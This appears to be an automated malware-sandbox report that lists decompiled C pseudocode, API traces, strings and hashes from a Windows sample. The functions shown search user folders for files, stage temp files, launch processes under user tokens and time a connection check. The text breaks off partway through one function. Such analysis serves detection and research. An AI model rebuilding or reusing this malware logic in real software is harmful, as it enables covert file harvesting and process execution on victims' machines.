    • API ID: FromString
    • String ID: Global\$Local\
    • API String ID: 1694596556-639276846
    • Opcode ID: 7278306d349c395fd35799c7ffd7cd0995aa74f355f011cdb00bcf43f0c1c336
    • Instruction ID: 6921511f8213237aa3190551336601090e39465f08dfe03d5702416117fc8f62
    • Opcode Fuzzy Hash: 7278306d349c395fd35799c7ffd7cd0995aa74f355f011cdb00bcf43f0c1c336
    • Instruction Fuzzy Hash: 4A11047251024E66CF14DB74CC46FEF7BA9EB48705F01882BE612E6181DAB8D685C798
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040E9E0(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v572;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v52;
    				E00419DD3(0x81, _t32);
    				_v16 = _t32;
    				_v28 = 0x26;
    				_v24 = 0x1a;
    				_v20 = 0x23;
    				E00411A74( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v572;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E004170EA( &_v572,  &_v16, _t37, 1, 2, E0040E745,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E004119C1(_v12);
    				}
    				return E0040C9F4(_t29, _v12, 0xcb);
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 0040EA30
      • Part of subcall function 004170EA: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00417129
      • Part of subcall function 004170EA: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417150
      • Part of subcall function 004170EA: PathMatchSpecW.SHLWAPI(?,?), ref: 0041719A
      • Part of subcall function 004170EA: Sleep.KERNEL32(00000000,?,?), ref: 004171F7
      • Part of subcall function 004170EA: FindNextFileW.KERNEL32(?,?), ref: 00417225
      • Part of subcall function 004170EA: FindClose.KERNEL32(?), ref: 00417237
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: ae5a304d267eefeee88c612ad5191feef5d2736a9105343f3ee95a00ff78a942
    • Instruction ID: 06e93f8c3f0db108889f547c60c9b70597043ada0c843dadf72a7d0c0089bcad
    • Opcode Fuzzy Hash: ae5a304d267eefeee88c612ad5191feef5d2736a9105343f3ee95a00ff78a942
    • Instruction Fuzzy Hash: 8811A0B2A01228BADB209B92DC09FEF7F78FF45744F00416AF505B6190D7785B86CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040F301(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v60;
    				char _v580;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v60;
    				E00419DD3(0x95, _t32);
    				_v16 = _t32;
    				_v28 = 0x26;
    				_v24 = 0x1a;
    				_v20 = 0x23;
    				E00411A74( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v580;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E004170EA( &_v580,  &_v16, _t37, 1, 2, E0040F072,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E004119C1(_v12);
    				}
    				return E0040C9F4(_t29, _v12, 0xcb);
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 0040F351
      • Part of subcall function 004170EA: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00417129
      • Part of subcall function 004170EA: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417150
      • Part of subcall function 004170EA: PathMatchSpecW.SHLWAPI(?,?), ref: 0041719A
      • Part of subcall function 004170EA: Sleep.KERNEL32(00000000,?,?), ref: 004171F7
      • Part of subcall function 004170EA: FindNextFileW.KERNEL32(?,?), ref: 00417225
      • Part of subcall function 004170EA: FindClose.KERNEL32(?), ref: 00417237
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: a4cffd6df5e16610feefc4b88e8f4ec0dc60326005b9bbd734109b8de98fe9a7
    • Instruction ID: 075b4ceedec5918eb6651cc31aa2b988599fffd14de391f702579241efa5201b
    • Opcode Fuzzy Hash: a4cffd6df5e16610feefc4b88e8f4ec0dc60326005b9bbd734109b8de98fe9a7
    • Instruction Fuzzy Hash: 0611A0B5A01218BADB209B92DC49FDFBF78EF41714F00007AF605B6180D2785B8ACBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00406954(void* __eflags) {
    				signed int _v8;
    				char _v20;
    				char _v44;
    				char _v92;
    				void* __edi;
    				void* __esi;
    				void* _t17;
    				CHAR* _t27;
    				intOrPtr* _t28;
    				WCHAR* _t30;
    				struct HINSTANCE__* _t31;
    
    				_t30 =  &_v44;
    				E00419DD3(0xe3, _t30);
    				_t31 = GetModuleHandleW(_t30);
    				if(_t31 != 0) {
    					_t27 =  &_v20;
    					E00419D9D(0xe4, _t27);
    					_t28 = GetProcAddress(_t31, _t27);
    					if(_t28 == 0) {
    						L4:
    						_t17 = 0;
    						L6:
    						return _t17;
    					}
    					_v8 = _v8 & 0x00000000;
    					_t32 =  &_v92;
    					E00419DD3(0xd5,  &_v92);
    					_push(0x1e6);
    					_push("0xA8660B2A");
    					if(E0041272F( &_v8, _t32, 0x3030303) > 0) {
    						 *_t28(0, _v8, "#", 0x10040);
    						E004119C1(_v8);
    						_t17 = 1;
    						goto L6;
    					}
    					goto L4;
    				}
    				return 0;
    			}















    APIs
    • GetModuleHandleW.KERNEL32(?), ref: 0040696B
    • GetProcAddress.KERNEL32(00000000,?), ref: 0040698D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: 0xA8660B2A
    • API String ID: 1646373207-761630507
    • Opcode ID: 8871f7cd047d6d84aa7cd9a0bc34efabd49865e1ba405e0615317d7c02e9e125
    • Instruction ID: 2b23eb0bc887a5fa6e7a7b939be7cf67a5b0923af1fe516493645017eb86d32b
    • Opcode Fuzzy Hash: 8871f7cd047d6d84aa7cd9a0bc34efabd49865e1ba405e0615317d7c02e9e125
    • Instruction Fuzzy Hash: F601F5B6A00254B7CB117BA68C06BCF7B6C9B40715F010076FD02F7281CA78DE4585A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00416D3D(intOrPtr _a4, intOrPtr _a8) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t12;
    				void* _t20;
    				void* _t21;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t20 = 0;
    				while(1) {
    					_push(_a4);
    					_push(E00412CFA());
    					_push(L"tmp");
    					_t19 =  &_v1044;
    					_t12 = E004126B4(_t11, 0x104,  &_v1044, L"%s%08x.%s");
    					_t21 = _t21 + 0x10;
    					if(_t12 == 0xffffffff) {
    						goto L6;
    					}
    					if(E00417246(_t19, _a8,  &_v524) == 0 || E00416B71(_a8, 0, 0) == 0) {
    						_t20 = _t20 + 1;
    						if(_t20 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}










    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 00416D54
      • Part of subcall function 00412CFA: GetTickCount.KERNEL32 ref: 00412CFA
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
      • Part of subcall function 00416B71: CreateFileW.KERNEL32(0041349B,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416B8B
      • Part of subcall function 00416B71: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416BAE
      • Part of subcall function 00416B71: CloseHandle.KERNEL32(00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416BBB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
    • String ID: %s%08x.%s$tmp
    • API String ID: 3395140874-234517578
    • Opcode ID: 4076a5ce9fbffcfe374d66e7aed3f183fb4f4f4cf0d5fa87cc587a9cace22262
    • Instruction ID: ba6b453534db589e838a02ba1f33eb9fb75867dd315a44fcbe3885935b65886f
    • Opcode Fuzzy Hash: 4076a5ce9fbffcfe374d66e7aed3f183fb4f4f4cf0d5fa87cc587a9cace22262
    • Instruction Fuzzy Hash: 9901263220021426DF207A14EC06BEF776DEB12329F104173FE65A62E1C279CDD6969C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415595(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v524;
    				void* __esi;
    				WCHAR* _t17;
    				intOrPtr _t25;
    				int _t27;
    
    				_t27 = 0;
    				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E00416D1C( &_v524) != 0) {
    					_t17 = PathFindFileNameW( &_v524);
    					_t25 = _a4;
    					E00411B40(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
    					E004119FD(_t25, "?T", 2);
    					 *((char*)(_t25 + 2)) = 0x5c;
    					_t27 = 1;
    				}
    				return _t27;
    			}









    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 004155B7
      • Part of subcall function 00416D1C: SetFileAttributesW.KERNEL32(00000080,00000080,00407338,?), ref: 00416D25
      • Part of subcall function 00416D1C: DeleteFileW.KERNEL32(?), ref: 00416D2F
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 004155D9
      • Part of subcall function 00411B40: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00412838,00000000,00000000,00000000,00411B9D,00000000,00000000,00000000,?,00000000), ref: 00411B5B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: af676cb200cca581294be78dea20f02541230fe462298c14caf1af194cee1762
    • Instruction ID: 5a1c857c2f397988f01a23b915af38b9c82897f342a914d12cdad1500640b7f8
    • Opcode Fuzzy Hash: af676cb200cca581294be78dea20f02541230fe462298c14caf1af194cee1762
    • Instruction Fuzzy Hash: 2301D676A0031467CB109B69DC4AFCBBBAC9F44B60F0043627A69F31D2D778E944CAE4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0041C499(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
    				void* _t13;
    				void** _t24;
    				void* _t27;
    
    				_t13 = _a4(_a8,  &_a8);
    				if(_t13 != 0) {
    					_t24 = E004150B0(__ecx, _a8);
    					if(_t24 != 0) {
    						if(EqualSid( *_t24, _a12) != 0) {
    							_t27 = _a8;
    							if(E0041272F( &_a4, L"\"%s\"", _a16) > 0) {
    								E004132E3(_t27, _a4);
    								E004119C1(_a4);
    							}
    						}
    						E004119C1(_t24);
    					}
    					return CloseHandle(_a8);
    				}
    				return _t13;
    			}







    APIs
      • Part of subcall function 004150B0: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,00412FFA,?,?,?,00406161,000000FF,00422540), ref: 004150C9
      • Part of subcall function 004150B0: GetLastError.KERNEL32(?,?,00412FFA,?,?,?,00406161,000000FF,00422540,?,?,00000000), ref: 004150CF
      • Part of subcall function 004150B0: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00412FFA,?,?,?,00406161,000000FF,00422540), ref: 004150F5
    • EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0041C5F3,00000000,?,?,?), ref: 0041C4BE
      • Part of subcall function 004132E3: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 004132F4
      • Part of subcall function 004132E3: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00413313
      • Part of subcall function 004132E3: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041331F
      • Part of subcall function 004132E3: CreateProcessAsUserW.ADVAPI32(?,00000000,0041C4ED,00000000,00000000,00000000,0041C4ED,0041C4ED,00000000,?,?,?,00000000,00000044), ref: 00413390
      • Part of subcall function 004132E3: CloseHandle.KERNEL32(?), ref: 004133A3
      • Part of subcall function 004132E3: CloseHandle.KERNEL32(?), ref: 004133A8
      • Part of subcall function 004132E3: FreeLibrary.KERNEL32(?), ref: 004133BF
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    • CloseHandle.KERNEL32(?,?,00000000,?,0041C5F3,00000000,?,?,?), ref: 0041C4FF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
    • String ID: "%s"
    • API String ID: 4035272744-3297466227
    • Opcode ID: 473bf4285a279e5dc8a085de0739f2076f3f82945a3032696d8c43c0fabdd85c
    • Instruction ID: 42264e16f4f2fa84f0012acf87d864ab188ed6234e71e7f079b6a21fe7ec7148
    • Opcode Fuzzy Hash: 473bf4285a279e5dc8a085de0739f2076f3f82945a3032696d8c43c0fabdd85c
    • Instruction Fuzzy Hash: E2F06D75100109BBCF116F26EC55EDF3F69AF40390B008036FD18A5221DB36DAA0DBAC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00413A8A(intOrPtr __eax) {
    				long _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char* _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char _v56;
    				void* __edi;
    				intOrPtr _t26;
    
    				_t26 = 0;
    				_v56 = 0x101;
    				_v52 = 0;
    				_v48 = __eax;
    				_v44 = E00413A09();
    				_v40 = "http://www.google.com/webhp";
    				_v36 = 0;
    				_v32 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0x80000;
    				_v12 = 0;
    				asm("clc");
    				_v8 = GetTickCount();
    				if(E004138D7( &_v56, 0) != 0) {
    					_t26 = GetTickCount() - _v8;
    				}
    				E004119C1(_v44);
    				return _t26;
    			}



















    APIs
      • Part of subcall function 00413A09: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00413A1A
      • Part of subcall function 00413A09: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413A2D
      • Part of subcall function 00413A09: FreeLibrary.KERNEL32(?), ref: 00413A7F
    • GetTickCount.KERNEL32 ref: 00413ACF
      • Part of subcall function 004138D7: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 0041392B
      • Part of subcall function 004138D7: InternetCloseHandle.WININET(00000000), ref: 004139C4
    • GetTickCount.KERNEL32 ref: 00413AE1
    Strings
    • http://www.google.com/webhp, xrefs: 00413AAF
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
    • String ID: http://www.google.com/webhp
    • API String ID: 2673491915-2670330958
    • Opcode ID: 135f4f5165967e31bc5e6405accfa33476e4a5e2f92baf92c1b507c2020d35a6
    • Instruction ID: 6667749a8a186ab824bc74c6fb61b57b2bd469dbe3bef38431f3c4bb1912175b
    • Opcode Fuzzy Hash: 135f4f5165967e31bc5e6405accfa33476e4a5e2f92baf92c1b507c2020d35a6
    • Instruction Fuzzy Hash: 9401E8B1D11228AACF00EFE9D9444CEFFB8AF08758F10416BE900B7211D7B85A458BD8
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • GetCurrentThreadId.KERNEL32 ref: 00408B46
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00408B50
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$CurrentObjectProcessSingleWaitWindow
    • String ID: x>B
    • API String ID: 419583955-2092227387
    • Opcode ID: 95b02a5921195f782d90f7a0317501b8258145dad62e3e28a56f1570bd2d2e04
    • Instruction ID: 10a78e645fd93681e8a66568c96388f29e7a526c2236b87dfecb00d338db2266
    • Opcode Fuzzy Hash: 95b02a5921195f782d90f7a0317501b8258145dad62e3e28a56f1570bd2d2e04
    • Instruction Fuzzy Hash: F8F08962A011217AC2201AA67A88C97BB68DAA67F5355043FF284B22519A38540185BD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00408BBD(void* __eax) {
    				void* __ebx;
    				long _t8;
    				intOrPtr _t16;
    				struct HWND__* _t19;
    
    				if(__eax + 0x422586 == 0 || E00406473() == 0) {
    					return GetCapture();
    				}
    				_t8 = GetCurrentThreadId();
    				_t16 =  *0x423e88;
    				if( *((intOrPtr*)(_t16 + 0x10c)) != _t8) {
    					L6:
    					return 0;
    				} else {
    					_t19 =  *(_t16 + 0x108);
    					if(_t19 == 0 || IsWindow(_t19) != 0) {
    						return _t19;
    					} else {
    						E0040824F(0, 0x423e78, _t11, _t11, _t11);
    						goto L6;
    					}
    				}
    			}








    APIs
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • GetCurrentThreadId.KERNEL32 ref: 00408BCF
    • IsWindow.USER32(?), ref: 00408BEE
      • Part of subcall function 0040824F: WaitForSingleObject.KERNEL32(?,000000FF,74EDA660,00408688,00000000), ref: 00408255
      • Part of subcall function 0040824F: ReleaseMutex.KERNEL32(?), ref: 00408289
      • Part of subcall function 0040824F: IsWindow.USER32(?), ref: 00408290
      • Part of subcall function 0040824F: PostMessageW.USER32(?,00000215,00000000,?), ref: 004082AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleWaitWindow$CurrentMessageMutexPostReleaseThread
    • String ID: x>B
    • API String ID: 904989000-2092227387
    • Opcode ID: fa60bb6c101bfaebf1cf7175f4abfc3b161c2906a21c61d5a9bc2c004b075ddc
    • Instruction ID: 24aaaf3b7468e9ae223df288cd10b8b37631397046dab6c6cb3ea8fa1b625237
    • Opcode Fuzzy Hash: fa60bb6c101bfaebf1cf7175f4abfc3b161c2906a21c61d5a9bc2c004b075ddc
    • Instruction Fuzzy Hash: 69F0A7326090205BEA10AFA57F849A773249B5074574D40BFE985F6261DB3D4C8259FC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00408B6D(void* __eax, void* __ecx) {
    				void* __ebx;
    				void* __esi;
    
    				if(E00406473() == 0) {
    					return ReleaseCapture();
    				}
    				if( *((intOrPtr*)( *0x423e88 + 0x10c)) != GetCurrentThreadId()) {
    					SetLastError(5);
    					return 0;
    				} else {
    					E0040824F(0, 0x423e78, 0, 0, 0);
    					return 1;
    				}
    			}






    APIs
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • GetCurrentThreadId.KERNEL32 ref: 00408B7E
    • SetLastError.KERNEL32(00000005), ref: 00408BAD
      • Part of subcall function 0040824F: WaitForSingleObject.KERNEL32(?,000000FF,74EDA660,00408688,00000000), ref: 00408255
      • Part of subcall function 0040824F: ReleaseMutex.KERNEL32(?), ref: 00408289
      • Part of subcall function 0040824F: IsWindow.USER32(?), ref: 00408290
      • Part of subcall function 0040824F: PostMessageW.USER32(?,00000215,00000000,?), ref: 004082AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleWait$CurrentErrorLastMessageMutexPostReleaseThreadWindow
    • String ID: x>B
    • API String ID: 2244431463-2092227387
    • Opcode ID: 787ea913234f6a13e8650b99f765dce53eb196ae70396454707b3e4c8f03d3e0
    • Instruction ID: 2d709ef51a9e34845efab676d515b492a8e645f74174018df3df49de073cc0cc
    • Opcode Fuzzy Hash: 787ea913234f6a13e8650b99f765dce53eb196ae70396454707b3e4c8f03d3e0
    • Instruction Fuzzy Hash: 50E0D8B16001106FD700AFB0AE809B33368EBA5316B5544BEF485F5161DB7D8C01897C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415A7D(signed char* __esi, long _a4, _Unknown_base(*)()* _a8, char _a12) {
    				void* _t9;
    
    				if( *__esi < 0x40) {
    					if(_a8 == 0) {
    						L6:
    						return 1;
    					}
    					_t2 =  &_a12; // 0x422428
    					_t9 = CreateThread(0, _a4, _a8,  *_t2, 0, 0);
    					if(_t9 == 0) {
    						L2:
    						return 0;
    					}
    					__esi[4 + ( *__esi & 0x000000ff) * 4] = _t9;
    					 *__esi =  *__esi + 1;
    					goto L6;
    				}
    				SetLastError(0x9b);
    				goto L2;
    			}





    APIs
    • SetLastError.KERNEL32(0000009B,00406914,00000000,0040A2E5,00000000,00422428,00000000,00000104,7519F560,00000000), ref: 00415A87
    • CreateThread.KERNEL32 ref: 00415AAA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateErrorLastThread
    • String ID: ($B
    • API String ID: 1689873465-2686783312
    • Opcode ID: cdd5ebe7c2a2bc4f48ac195679477be46a3e3bef5521a245b7fb0a8184c94c3b
    • Instruction ID: 8ece5e0666ce7c978b8b271948b13384d930cf9680fa5f9d6c3a1653e7dd2f3f
    • Opcode Fuzzy Hash: cdd5ebe7c2a2bc4f48ac195679477be46a3e3bef5521a245b7fb0a8184c94c3b
    • Instruction Fuzzy Hash: 7AE09234188341EADB258F609A44BA6BFE06F8EB41F14485EF3C1261E0C3794484DBAA
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetFileSizeEx.KERNEL32(bxA,bxA,?,?,?,00417862,00000000), ref: 00416D01
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FileSize
    • String ID: bxA$bxA
    • API String ID: 3433856609-2174343480
    • Opcode ID: 5f0a4832a05c3cccab329472e8a5f3abf7800f5ecc49318a7a127592a859c1d9
    • Instruction ID: 381c4df682255645357ea4338af2c18d70994b2a5acd560f8039388629e13d76
    • Opcode Fuzzy Hash: 5f0a4832a05c3cccab329472e8a5f3abf7800f5ecc49318a7a127592a859c1d9
    • Instruction Fuzzy Hash: 25D05E75700108BB9B14CB69DC41DDE7BBDAB45360B218221F51196290D7B0EE418AA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040F072(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				char _v524;
    				char _v576;
    				char _v580;
    				char _v588;
    				intOrPtr _v608;
    				char _v612;
    				char _v620;
    				char _v628;
    				char _v632;
    				char* _v640;
    				signed int _v644;
    				char* _v648;
    				char** _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				char* _v664;
    				char* _v668;
    				char* _v672;
    				char* _v676;
    				void* __edi;
    				void* __esi;
    				signed int _t84;
    				char* _t85;
    				intOrPtr _t87;
    				char** _t103;
    				char* _t114;
    				char* _t123;
    				char* _t124;
    				void* _t125;
    				char* _t128;
    				char* _t129;
    				intOrPtr* _t133;
    				signed char* _t148;
    				char* _t157;
    				void* _t158;
    				intOrPtr* _t162;
    				signed int _t168;
    				char* _t169;
    				char** _t170;
    				intOrPtr _t172;
    				char* _t173;
    				signed int _t174;
    				void* _t176;
    
    				_t148 = __edx;
    				_t176 = (_t174 & 0xfffffff8) - 0x294;
    				if(E00417246( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L32:
    					return 1;
    				}
    				_t179 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_push( &_v524);
    					_t84 = 2;
    					_t85 = E00416BD6(_t84,  &_v524,  &_v612);
    					__eflags = _t85;
    					if(_t85 == 0) {
    						goto L32;
    					}
    					_t87 = E0041225C(_v608,  &_v652, _v612, 1, 0);
    					_v660 = _t87;
    					__eflags = _t87 - 0xffffffff;
    					if(_t87 == 0xffffffff) {
    						L31:
    						E00416C7E( &_v612);
    						goto L32;
    					}
    					_v640 = E00411991(0x622);
    					E00419D9D(0x91,  &_v588);
